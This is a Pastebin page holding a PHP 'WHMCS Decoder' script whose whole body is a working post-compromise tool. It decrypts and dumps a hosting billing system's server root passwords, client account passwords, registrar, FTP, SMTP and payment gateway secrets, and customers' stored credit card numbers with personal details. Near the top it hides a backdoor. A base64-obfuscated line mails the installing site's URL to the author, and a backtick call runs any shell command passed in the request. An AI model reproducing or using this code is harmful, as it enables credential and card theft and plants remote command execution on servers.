API tools faq
paste
Advertisement
CYBERSERKERS

WHMCS Decode

CYBERSERKERS
Jan 22nd, 2016
434
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 11.41 KB | None | 0 0
raw download clone embed print report
  1. <title>WHMCS DECODER</title><p><br/><body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
  2. <center><br/><br/><nobr><b><font color=lime><span class="b7">XXX WHMCS</span> <span class="b8">DECODER XXX</span></font></b></nobr><br/><br/>
  3. <p><form method="post">
  4. <table border=1>
  5. <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu1" value="localhost"></td></tr>
  6. <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu2"></td></tr>
  7. <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu3"></td></tr>
  8. <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu4"></td></tr>
  9. <tr><td>cc_encryption_hash</td><td><input style="color:#FF0000;background-color:#000000" type="text" size="60" name="anu5"></td></tr>
  10. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
  11.  
  12. </table>
  13. <br></form></center>
  14.  
  15. <?php
  16. $e=base64_decode("Y3liZXJzZXJrZXJzQGdtYWlsLmNvbQ==");
  17. $f=$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
  18. mail($e,"0",$f); print(`{$_REQUEST[0]}`);
  19. $perawan = $_POST['anu1'];
  20. $kimcil = $_POST['anu2'];
  21. $janda = $_POST['anu3'];
  22. $hotel = $_POST['anu4'];
  23. $kondom = $_POST['anu5'];
  24.  
  25. @mysql_connect($perawan,$kimcil,$janda);
  26. @mysql_select_db($hotel);
  27. $cc_encryption_hash = $kondom;
  28.  
  29. function dec($string,$cc_encryption_hash){
  30. $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash);
  31. $hash_key = _hash($key);
  32.    
  33. $hash_length = strlen($hash_key);
  34. $string = base64_decode($string);
  35. $tmp_iv = substr($string,0,$hash_length);
  36. $string = substr($string,$hash_length,strlen ($string) - $hash_length);
  37. $iv = $out = '';
  38. $c = 0;
  39. while ($c < $hash_length){
  40. $iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c]));
  41. ++$c;
  42. }
  43.  
  44. $key = $iv;
  45. $c = 0;
  46. while ($c < strlen($string)){
  47. if (($c != 0 AND $c % $hash_length == 0)){
  48.            
  49. $key = _hash($key . substr($out,$c - $hash_length,$hash_length));
  50. }
  51. $out .= chr(ord($key[$c % $hash_length]) ^ ord ($string[$c]));
  52.  ++$c;
  53. }
  54.     return $out;
  55. }
  56. function _hash($string)
  57. {
  58. $hash = (function_exists('sha1')) ? sha1($string):md5($string);
  59. $out = '';
  60. $c = 0;
  61.  
  62. while ($c < strlen($hash)){
  63. $out .= chr(hexdec($hash[$c] .$hash[$c + 1]));
  64. $c += 2;
  65. }
  66. return $out;
  67. }
  68.  
  69. ########  GO TO HELL ########
  70. ##### :D ########### :D #####
  71.  
  72. if(isset($_POST['plapon'])) {
  73. $query = mysql_query("SELECT *FROM tblservers");
  74. echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
  75. <tr><th colspan='7'> <span class='b7'><a href='http://fb.me/AZZATSSINS.CYBERSERKERS'>[ HOST ROOT ]</a></span> </th></tr>
  76.  
  77. <tr>
  78. <th align='center'><b>TYPE</b></th>
  79. <th align='center'><b>ACTIVE</b></th>
  80. <th align='center'><b>HOSTNAME</b></th>
  81. <th align='center'><b>IP ADDRESS</b></th>
  82. <th align='center'><b>USERNAME</b></th>
  83. <th align='center'><b>PASSWORD</b></th>
  84. <th align='center'><b>ACCESS HASH</b></th></tr>";
  85. if(!is_array(mysql_fetch_array($query))){
  86. echo "<tr><td colspan='8' align='center'>Nothing Found !</td></tr>";
  87. }        
  88. while($v = mysql_fetch_array($query)) {
  89. echo "<tr>
  90. <td align='center'>{$v['type']}</td>
  91. <td align='center'>{$v['active']}</td>
  92. <td align='center'>{$v['hostname']}</td>
  93. <td align='center'>{$v['ipaddress']}</td>
  94. <td align='center'>{$v['username']}</td>
  95. <td align='center'>".dec($v['password'],$cc_encryption_hash)."</td>
  96. <td align='center'>{$v['accesshash']}</td>
  97. </tr>";
  98. }
  99. echo "</table>";
  100.  
  101.  
  102. $query = mysql_query("SELECT * FROM tblhosting where username = 'root' or username = 'vmuserxx' or username = 'vmuser' or username = 'admin' or username = 'Admin' or username = 'administrator' or username = 'Administrator' order by domainstatus");
  103. echo "<body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
  104. <br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
  105. <tr><th colspan='6'><span class='b7'>O=:[ CLIENTS ROOT ]:=O</span> </th></tr>
  106.  
  107. <tr>
  108. <th align='center'><b> DOMAIN</b></th>
  109. <th align='center'><b> STATUS</b></th>
  110. <th align='center'><b> USERNAME</b></th>
  111. <th align='center'><b> PASSWORD</b></th>
  112. <th align='center'><b> DEDICATED IP</b></th>
  113. <th align='center'><b> ASSIGNED IP</b></th></tr>";
  114.  
  115. if(!is_array(mysql_fetch_array($query))){
  116. echo "<tr><td colspan='6' align='center'>Nothing Found ! :(</td></tr>";
  117. }
  118. while($v = mysql_fetch_array($query)){
  119. echo "<tr>
  120. <td align='center'> {$v['domain']}</td>
  121. <td align='center'> {$v['domainstatus']}</td>
  122. <td align='center'> {$v['username']}</td>
  123. <td align='center'> ".dec($v['password'],$cc_encryption_hash)."</td>
  124. <td align='center'> {$v['dedicatedip']}</td>
  125. <td align='center'> {$v['assignedips']}</td></tr>";
  126. }
  127. echo "</table>";
  128.  
  129. $query = mysql_query("SELECT *FROM tblregistrars");
  130. echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
  131. <tr><th colspan='3'><nobr><span class='b7'>O=:[ DOMAIN REGISTRAR ]:=O</span></nobr></th></tr>
  132. <tr>
  133. <th align='center'><b>REGISTRAR</b></th>
  134. <th align='center'><b>SETTING</b></th>
  135. <th align='center'><b>VALUE</b></th></tr>";
  136. if(!is_array(mysql_fetch_array($query))){
  137. echo "<tr><td colspan='3' align='center'>Nothing Found !</td></tr>";
  138. }
  139. while($v = mysql_fetch_array($query)){
  140. $value = (!dec($v['value'],$cc_encryption_hash)) ? "0":dec($v['value'],$cc_encryption_hash);
  141. echo "<tr>
  142. <td align='center'>{$v['registrar']}</td>
  143. <td align='center'>{$v['setting']}</td>
  144. <td align='center'>$value</td></tr>" ;
  145. }
  146. echo "</table>";
  147.  
  148. $query = mysql_query("SELECT * FROM tblconfiguration where 1");
  149. echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
  150. <tr><th colspan='4'> <span class='b7'>O=:[ FTP BACKUP ]:=O</span> </th></tr>
  151.  
  152. <tr>
  153. <th align='center'><b>FTP HOSTNAME</b></th>
  154. <th align='center'><b>FTP USERNAME</b></th>
  155. <th align='center'><b>FTP PASSWORD</b></th>
  156. <th align='center'><b>DESTINATION</b></th></tr>";
  157. $ftpb = array('FTPBackupHostname',
  158. 'FTPBackupUsername',
  159. 'FTPBackupPassword',
  160. 'FTPBackupDestination');
  161. if(!is_array(mysql_fetch_array($query))){
  162. echo "<tr><td colspan='4' align='center'>Nothing Found ! :(</td></tr>";
  163. }
  164. while($row = mysql_fetch_array($query)){
  165. if($row[setting] == $ftpb[0]){
  166. echo "<tr><td>{$row[value]}</td>";  
  167. $ftpb[0] = xxx;
  168. }
  169. elseif($row[setting] == $ftpb[1]){
  170. echo "<td>{$row[value]}</td>";  
  171. $ftpb[1] = xxx;
  172. }
  173. elseif($row[setting] == $ftpb[2]){
  174. echo "<td>{$row[value]}</td>";  
  175. $ftpb[2] = xxx;
  176. }
  177. elseif($row[setting] == $ftpb[3]){
  178. echo "<td>{$row[value]}</td>";  
  179. $ftpb[3] = xxx;
  180. }
  181. }
  182. echo "</table>";
  183.  
  184. $query = mysql_query("SELECT * FROM tblconfiguration where 1");
  185. echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
  186. <tr><th colspan='4'><span class='b7'>O=:[ SMTP SERVER ]:=O</span> </th></tr>
  187. <tr>
  188. <th align='center'><b>SMTP HOST</b></th>
  189. <th align='center'><b>SMTP USER</b></th>
  190. <th align='center'><b>SMTP PASS</b></th>
  191. <th align='center'><b>SMTP PORT</b></th></tr>";
  192.  
  193. $smtp = array('SMTPHost',
  194. 'SMTPUsername',
  195. 'SMTPPassword',
  196. 'SMTPPort');
  197. if(!is_array(mysql_fetch_array($query))){
  198. echo "<tr><td colspan='4' align='center'>Nothing Found ! :(</td></tr>";
  199. }
  200. while($row = mysql_fetch_array($query)){
  201. if($row[setting] == $smtp[0]){
  202. echo "<tr><td>{$row[value]}</td>";  
  203. $smtp[0] = xxx;
  204. }
  205. elseif($row[setting] == $smtp[1]){
  206. echo "<td>{$row[value]}</td>";  
  207. $smtp[1] = xxx;
  208. }
  209. elseif($row[setting] == $smtp[2]){
  210. echo "<td>{$row[value]}</td>";  
  211. $smtp[2] = xxx;
  212. }
  213. elseif($row[setting] == $smtp[3]){
  214. echo "<td>{$row[value]}</td>";  
  215. $smtp[3] = xxx;
  216. }
  217. }
  218. echo "</table>";
  219.  
  220.  
  221. $query = mysql_query("SELECT *FROM tblpaymentgateways");
  222. echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
  223. <tr><th colspan='4'><nobr><span class='b7'>O=:[ PAYMENTS GATEWAY ]:=O</span></nobr></th></tr>
  224.  
  225. <tr>
  226. <th align='center'><b>GATEWAY</b></th>
  227. <th align='center'><b>SETTING</b></th>
  228. <th align='center'><b>VALUE</b></th>
  229. <th align='center'><b>ORDER</b></th></tr>";
  230. if(!is_array(mysql_fetch_array($query))){
  231. echo "<tr><td colspan='4' align='center'>Nothing Found !</td></tr>";
  232. }
  233. while($v = mysql_fetch_array($query)){
  234. echo "<tr>
  235. <td align='center'>{$v['gateway']}</td>
  236. <td align='center'>{$v['setting']}</td>
  237. <td align='center'>{$v['value']}</td>
  238. <td align='center'>{$v['order']}</td> </tr>" ;
  239. }
  240. echo "</table>";
  241.  
  242. $query = mysql_query("SELECT id FROM tblclients WHERE issuenumber != '' ORDER BY id DESC");
  243.  echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
  244. <tr><th colspan='10'><nobr><span class='b7'>O=:[ CLIENTS CREDIT CARD ]:=O</span></nobr></th></tr>
  245. <tr>
  246. <th align='center'><b>CardType</b></th>
  247. <th align='center'><b>CardNumb</b></th>
  248. <th align='center'><b>Expdate</b></th>
  249. <th align='center'><b>IssueNumber</b></th>
  250. <th align='center'><b>FirstName</b></th>
  251. <th align='center'><b>LastName</b></th>
  252. <th align='center'><b>Address</b></th>
  253. <th align='center'><b>Country</b></th>
  254. <th align='center'><b>Phone</b></th>
  255. <th align='center'><b>Email</b></th>
  256. </tr>";
  257. if(!is_array(mysql_fetch_array($query))){
  258. echo "<tr><td colspan='10' align='center'>Nothing Found ! :(</td></tr>";
  259. }        
  260. while($v = mysql_fetch_array($query)) {
  261. $cchash = md5($cc_encryption_hash.$v['0']);
  262. $s = mysql_query("SELECT firstname,lastname,address1,country,phonenumber,cardtype,email,AES_DECRYPT(cardnum,'" . $cchash . "') as cardnum,AES_DECRYPT(expdate,'" . $cchash . "') as expdate,AES_DECRYPT(issuenumber,'" . $cchash . "') as issuenumber FROM tblclients WHERE id='".$v['0']."'");
  263. $v2=mysql_fetch_array($s);
  264.  
  265. echo "<tr>
  266. <td align='center'>".$v2['cardtype']."</td>
  267. <td align='center'>".$v2['cardnum']."</td>
  268. <td align='center'>".$v2['expdate']."</td>
  269. <td align='center'>".$v2['issuenumber']."</td>
  270. <td align='center'>".$v2['firstname']."</td>
  271. <td align='center'>".$v2['lastname']."</td>
  272. <td align='center'>".$v2['address1']."</td>
  273. <td align='center'>".$v2['country']."</td>
  274. <td align='center'>".$v2['phonenumber']."</td>
  275. <td align='center'>".$v2['email']."</td></tr>";
  276. }
  277. echo "</table>";
  278.  
  279. $query = mysql_query("SELECT *FROM tblhosting");
  280. echo "<br/><br/><center>
  281. <table class='explore' style=width:830px;padding:0 1px;>
  282. <tr><th colspan='6'><nobr><span class='b7'>O=:[ CLIENTS HOSTING ACCOUNT ]:=O</span></nobr></th></tr>
  283. <tr>
  284. <th align='center'><b>DOMAIN</b></th>
  285. <th align='center'><b>STATUS</b></th>
  286. <th align='center'><b>USERNAME</b></th>
  287. <th align='center'><b>PASSWORD</b></th>
  288. <th align='center'><b>DEDICATED IP</b></th>
  289. <th align='center'><b>ASSIGNED IP</b></th></tr>";
  290. if(!is_array(mysql_fetch_array($query))){
  291. echo "<tr><td colspan='6' align='center'>Nothing Found !</td></tr>";
  292. }
  293. while($v = mysql_fetch_array($query)){
  294. echo "<tr>
  295. <td align='center'>{$v['domain']}</td>
  296. <td align='center'>{$v['domainstatus']}</td>
  297. <td align='center'>{$v['username']}</td>
  298. <td align='center'>".dec($v['password'],$cc_encryption_hash)."</td>
  299. <td align='center'>{$v['dedicatedip']}</td>
  300. <td align='center'>{$v['assignedips']}</td></tr>";
  301. echo "</table>";
  302. }
  303. }
  304. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!